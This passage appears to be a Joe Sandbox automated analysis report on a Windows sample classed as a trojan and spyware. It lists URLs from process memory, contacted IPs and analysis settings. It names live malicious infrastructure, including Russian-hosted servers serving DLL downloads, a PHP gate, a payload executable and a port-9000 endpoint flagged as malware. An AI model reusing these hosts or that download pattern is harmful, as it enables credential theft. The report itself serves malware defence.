https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dll$	u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/vcruntime140.dllXqF~	u5g0.0.exe, 00000001.00000002.2073657722.0000000002F86000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u5g0.3.exe, 00000005.00000003.2124589441.0000000002789000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.0000000002726000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.00000000027C4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.0000000002782000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2928852683.0000014800455000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.215.85.66:9000t-dq	MSBuild.exe, 0000000E.00000002.2928216488.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977808405.000001481A5C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u5g0.0.exe, u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.215.85.66:	MSBuild.exe, 0000000E.00000002.2928216488.0000000003312000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.000000000336D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u5g0.0.exe, 00000001.00000003.1810768119.00000000231AD000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000002.00000002.1863624775.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1804255614.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2035551814.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2095606021.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp	false		high
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000002.00000002.1869479481.00000000041BC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.000000000525F000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u5g0.3.exe, 00000005.00000003.2124589441.0000000002744000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://185.172.128.76	u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com.	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.00000148020E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://185.172.128.76/15f649199f40275b/softokn3.dlln	u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://ocsp.sectigo.com0	R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u5g0.0.exe, 00000001.00000003.1810768119.00000000231AD000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.php4	u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://google.com	R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.00000148020E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
https://rt.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpQ	u5g0.0.exe, 00000001.00000003.1815221199.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpX	u5g0.0.exe, 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	u5g0.0.exe, 00000001.00000002.2100647420.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	false		high
http://91.215.85.66:9000	MSBuild.exe, 0000000E.00000002.2928216488.0000000003312000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08F	MSBuild.exe, 0000000E.00000002.2921328359.000000000149F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431534
Start date and time:	2024-04-25 12:15:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	R0hb7jyBcv.exe renamed because original name is a hash value
Original Sample Name:	74e9f3ba74c619021b87520b083c6a1d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/62@4/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 108 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.127.169.103, 40.126.29.14, 40.126.29.10, 40.126.29.7, 40.126.29.12, 40.126.29.15, 40.126.29.5, 40.126.29.6, 20.190.157.11, 199.232.210.172, 192.229.211.108, 20.3.187.198, 20.42.73.29, 20.166.126.56, 20.189.173.22, 23.55.253.34, 20.9.155.145
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, gig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:16:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
